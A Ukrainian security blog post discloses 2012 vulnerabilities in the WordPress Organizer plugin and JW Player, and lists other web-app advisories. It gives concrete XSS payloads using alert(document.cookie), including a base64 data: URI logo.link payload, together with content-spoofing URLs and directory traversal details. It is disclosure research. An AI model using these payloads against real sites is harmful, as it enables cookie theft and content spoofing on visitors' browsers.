Websecurity - Веб безпека

В продовження попередніх публікацій про дірки в плагіні Organizer, наведу ще 5 уразливостей в цьому дуже дірявому плагіні для WordPress.

Ще 15.04.2012 я знайшов Directory Traversal, Cross-Site Scripting та Full path disclosure уразливості в плагіні Organizer для WordPress. Це четверта порція уразливостей в плагіні Organizer. Як заявив мені розробник плагіна, він більше не підтримує його.

Раніше я писав про уразливості в Organizer для WordPress.

Directory Traversal:

http://site/wp-admin/wp-admin/admin.php?page=organizer/page/view.php

В полях Rename File to та Copy File As можна вказувати відносні шляхи (для переносу чи копіювання файлів в довільні каталоги, в тому числі перезапису існуючих файлів).

XSS:

POST запит на сторінці http://site/wp-admin/admin.php?page= organizer/page/dir.php
"><script>alert(document.cookie)</script>В полях dirname і newdirname.

Як я вже зазначав раніше, скрипт dir.php уразливий до CSRF, що спрощує проведення даних XSS атак.

FPD:

http://site/wp-admin/admin.php?page=organizer/page/users.php

Якщо для всіх ролей (в полі User) зроблені налаштування (в списку User Setting), то в тілі сторінки виводиться повідомлення про помилку з повним шляхом на сервері.

Уразливі Organizer 1.2.1 та попередні версії.

В даній добірці уразливості в веб додатках:

• RSA enVision Multiple Vulnerabilities (деталі)
• ChurchCMS 0.0.1 ‘admin.php’ Multiple SQLi (деталі)
• Multiple vulnerabilities in Piwigo (деталі)
• mysqldumper 1.24.4 LFI XSS CSRF PHPEXEC TRAVERSAL INFO DISCLOS (деталі)
• spip security update (деталі)
• ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal Vulnerability (деталі)
• DirectAdmin v1.403 - Multiple Cross Site Vulnerabilities (деталі)
• Car Portal CMS v3.0 - Multiple Web Vulnerabilities (деталі)
• C4B XPhone UC Web 4.1.890S R1 - Cross Site Vulnerability (деталі)
• DIY CMS v1.0 Poll - Multiple Web Vulnerabilities (деталі)

В даній добірці уразливості в веб додатках:

• Aruba Networks multiple advisories: OS command injection in RAP web interface and 802.1X EAP-TLS user authentication bypass (деталі)
• Multiple XSS vulnerabilities in XOOPS (деталі)
• Security advisory for Bugzilla 4.2.1, 4.0.6 and 3.6.9 (деталі)
• Specially crafted Json service request allows full control over a Liferay portal instance (деталі)
• Liferay 6.1 can be compromised in its default configuration (деталі)
• VMware vCenter Server, Orchestrator, Update Manager, vShield, vSphere Client, ESXi and ESX address several security issues (деталі)
• Specially crafted webdav request allows reading of local files on liferay 6.0.x (деталі)
• XSS in Kaseya version 6.2.0.0 web interface (деталі)
• PHP Ticket System Beta 1 ‘p’ SQL Injection (деталі)
• WebCalendar <= 1.2.4 Two Security Vulnerabilities (деталі)

В даній добірці уразливості в веб додатках:

• Apache OFBiz information disclosure vulnerability (деталі)
• Apache OFBiz information disclosure vulnerability (деталі)
• Siche Search v.0.5 Zerboard - Multiple Web Vulnerabilities (деталі)
• Total Quality Machines (productdetail.php) SQL Injection Vulnerabilities (деталі)
• Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities (деталі)
• ABB WebWare RobNetScanHost.exe Remote Code Execution Vulnerability (деталі)
• Acuity CMS 2.6.x <= Cross Site Scripting (деталі)
• DokuWiki Ver.2012/01/25 CSRF Add User Exploit (деталі)
• Multiple web-vulnerabilities in ownCloud 3.0.0 (деталі)
• Multiple vulnerabilities in Newscoop (деталі)

В даній добірці уразливості в веб додатках:

• Endian UTM Firewall v2.4.x & v2.5.0 - Multiple Web Vulnerabilities (деталі)
• t3_dbtools_seditio_plugin_CSRF (деталі)
• seditio_PmOS_plugin_XSS_vuln (деталі)
• sfquickban_plugin_CSRF (деталі)
• seditio-build170.20120302_sql_injection_CSRF_info_disclosure_XSS (деталі)
• Cisco Small Business SRP 500 Series Multiple Vulnerabilities (деталі)
• DHTMLX Suite v.3.0 - Multiple Web Vulnerabilities (деталі)
• Netjuke 1.0 RC1 - SQL Injection Vulnerabilities (деталі)
• ACC PHP eMail v1.1 - Multiple Web Vulnerabilites (деталі)
• FastPath Webchat | Multiple Cross Site Scripting Vulnerabilities (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Uploadify, All-in-One Event Calendar та WPsc-MijnPress. Для котрих з’явилися експлоіти. Uploadify - це плагін для надання можливості завантажувати файли на сайт, All-in-One Event Calendar - це плагін для створення календаря, WPsc-MijnPress - це фреймворк для розробників.

• Reflected XSS in Uploadify Integration Wordpress plugin (деталі)
• Multiple XSS vulnerabilities in All-in-One Event Calendar Plugin for WordPress (деталі)
• Wordpress WPsc-MijnPress plugin Cross-Site Scripting Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Polycom Web Management Interface O.S. Command Injection (деталі)
• CitrusDB 2.4.1 - LFI/SQLi Vulnerability (деталі)
• Multiple Vulnerabilities in OpenCart 1.5.2.1 (деталі)
• Apache Hadoop user impersonation vulnerability (деталі)
• PHPNuke Module’s Name Download SQL Injection Vulnerabilities (деталі)
• Path Traversal on Polycom Web Management Interface (деталі)
• Matterdaddy Market v1.1 - SQL Injection Vulnerabilities (деталі)
• GroupWare epesiBIM CRM 1.2.1 - Multiple Web Vulnerabilities (деталі)
• online newspaper university “newsdesc.php” SQL Injection Vulnerabilities (деталі)
• Local File Inclusion in Invision Power Board 3.3.0 (деталі)

28.05.2012

У травні, 25.05.2012, під час пентесту, я виявив Content Spoofing та Cross-Site Scripting уразливості в JW Player. Про деякі з цих CS уразливостей мені відомо ще з 2008 року, коли вперше зіштовхнувся з цим відеоплеєром на флеші. Про що найближчим часом повідомлю розробникам флеш додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

06.06.2012

Content Spoofing:

В параметрі file можна вказати як відео, так і аудіо файли.

Можна вказувати абсолютні URL (в параметрах file та image) для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/jwplayer.swf?file=1.flv&image=1.jpg

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL (в параметрі config) для включення зовнішніх файлів в флешку на цільовому сайті (параметри file та image в xml-файлі приймають довільні адреси). Для завантаження файла конфігурації з зовнішнього сайта він повинен мати crossdomain.xml.

http://site/jwplayer.swf?config=1.xml

1.xml

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL (в параметрі playlistfile) для включення зовнішніх файлів в флешку на цільовому сайті (параметри media:content та media:thumbnail в xml-файлі приймають довільні адреси). Для завантаження файла плейліста з зовнішнього сайта він повинен мати crossdomain.xml.

http://site/jwplayer.swf?playlistfile=1.rss
http://site/jwplayer.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

1.rss

<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title>Example playlist</title>
    <item>
      <title>Video #1</title>
      <description>First video.</description>
      <media:content url="1.flv" duration="5" />
      <media:thumbnail url="1.jpg" />
    </item>
    <item>
      <title>Video #2</title>
      <description>Second video.</description>
      <media:content url="2.flv" duration="5" />
      <media:thumbnail url="2.jpg" />
    </item>
  </channel>
</rss>

XSS:

http://site/jwplayer.swf?playerready=alert(document.cookie)

XSS:

Якщо на сайті на сторінці з jwplayer.swf (player.swf) є можливість включити (через HTML Injection) JS код з калбек функцією, а таких функцій всього 19, то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>

В ліцензійних версіях плеєра є така функція, як логотип. Тому в ліцензійних версіях swf-файла також є наступні уразливості.

Content Spoofing:

http://site/jwplayer.swf?file=1.flv&logo.file=1.jpg&logo.link=http://websecurity.com.ua

XSS:

http://site/jwplayer.swf?file=1.flv&logo.file=1.jpg&logo.link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі JW Player 5.9.2156 та попередні версії. А також всі веб додатки, що використовують дані версії JW Player, а це сотні веб додатків та мільйони сайтів в Інтернеті. Перша з наведених XSS уразливостей вже виправлена в версії 5.9.2206 (інші уразливості розробники планують виправити в наступній 6.0 версії). Лише деякі з цих уразливостей наявні в 3.x та попередніх версіях.

Swf-файли JW Player можуть мати різні імена, такі як jwplayer.swf та player.swf. За інформацією Google, існує близько 7709600 таких flash файлів в Інтернеті.

P.S.

Виправив код XSS в ліцензійний версії плеєра. Замість javascript: URI потрібно використовувати data: URI (перший варіант спрацьовував лише в старих версіях плеєра).

В даній добірці уразливості в веб додатках:

• Barracuda CudaTel v2.0.029.1 - Multiple Web Vulnerabilities (деталі)
• XSS and Blind SQL Injection Vulnerabilities in ExponentCMS (деталі)
• Chengdu Bureau of Commerce - SQL Injection Vulnerability (деталі)
• Havalite CMS v1.0.4 - Multiple Web Vulnerabilities (деталі)
• IPhone TreasonSMS - HTML Inject & File Include Vulnerability (деталі)
• VMware vCenter Chargeback Manager Information Leak and Denial of Service (деталі)
• phpMyBible 0.5.1 Mutiple XSS (деталі)
• typo3-src security update (деталі)
• idev Game Site CMS v1.0 - Multiple Web Vulnerabilites (деталі)
• osCmax Shop CMS v2.5.1 - Multiple Web Vulnerabilities (деталі)

Торік я писав про знайдену мною уразливість Certificate Spoofing в Google Chrome для Android. А нещодавно я навів відео-ролик з подібною уразливістю - в ньому демонструється експлоіт для SSL Spoofing в Mozilla Firefox. У відео не зазначалося, яка саме версія є вразливою, тому я провів власні дослідження в різних браузерах.

Сьогодні я виявив, що дана SSL Spoofing уразливість наявна не тільки в Firefox, але і в Internet Explorer. Дана уразливість дозволяє підробити URL в адресному рядку браузера і отримати SSL сертифікат від іншого сайта (точніше сказати, вона дозволяє для одного сайта підставити адресу іншого сайта в адресний рядок і в його SSL сертифікат), що може бути використано для проведення фішинг атак. Для перевірки я розробив експлоіт аналогічний показаному в відео-ролику.

Уразливі Mozilla Firefox 3.0.19 та Internet Explorer 6 (6.0.2900.2180).

При цьому Firefox 3.6.8, 4.0 beta 2 і вище невразливі, так само як Google Chrome і Opera. В IE7 та IE8 код не працює із-за несумісності (в цих версіях дощо змінена підтримка JS), але якщо зробити код під ці версії Internet Explorer, то експлоіт цілком може запрацювати.